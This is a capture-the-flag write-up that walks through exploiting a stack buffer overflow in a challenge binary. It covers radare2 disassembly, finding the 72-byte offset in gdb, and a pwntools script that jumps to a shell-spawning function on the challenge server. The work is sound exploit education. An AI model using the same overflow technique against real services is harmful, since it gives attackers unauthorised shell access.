![3ba8fbe5e255c70c29fccc800a95390b.png](721577ea7fd748ceb708479a2b5b75d3.png)
Taking a look at the file we see that it's **ELF 64-bit**
```
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=ae6fb7020a27e2fdccdb6826a57ccc5bfc0d127a, not stripped
```
Loading it in to **radare 2** and listing the functions we can see that there is a **win** function
![1c47e6611914b5e056810c53bb25d00b.png](b534e32c13434280bb405f3d3b750fea.png)
Disassembling that function with `pdf @sym.main`
![e8c2e08aa304218deaf7b7e46cf86239.png](36066f0f53284759b863fd6842427d43.png)
There's a lot going on. Looks like when the function is called it's checking for two arguments `0xdeadbeef` and `0x1337c0de` and then it gives us a shell? What if we skip the variable checks completely and jump to `0x004006cf`?
![cf83187a50f22756bcc76e1a9e827fdc.png](e4ba8524d894495ab9b700a5099033b0.png)
Loading the binary into **gdb** (using gef support), we can start poking at it and try to find the offset
I was having issues with `pattern create/search` so I did it the old fashioned way: sending lots of 'A's and 'B's until something looked neat
Using **gdb with gef** you can use `pi print('A'*100)` to quickly toss a string of characters together
After sending different lenghts, I found that **72** was when we started seeing the 'B' characters leak in
`pi print('A'*72 + 'B')`
![1d0c2ad3a03f013ae93ae75efe95b26e.png](4bb7af9cbe2c43938ab82bd141c02638.png)
Things we know:
1. The offset is **72**
2. The address we want to jump to is **0x004006cf**
3. It's an **ELF 64-bit** binary
That's enough to write a script using **Pwntools**. Here's mine
```Python
from pwn import *
p = remote('dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io', 7480)
offset = b'A' * 72
print(p.recvuntil('joke\n'))
p.sendline(offset + p64(0x004006cf))
p.interactive()
```
The `p64(0x004006cf)` function call packs the address in **Little Endian** format, required to be passed, and `p.interactive()` just catches the shell and allows us to send input.
![09a1d31923b3c137fd108739b380d6c1.png](fdab4da1fdbc4d5db1aa5f916c4deecf.png)
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #exploit_development #buffer_overflow
Related: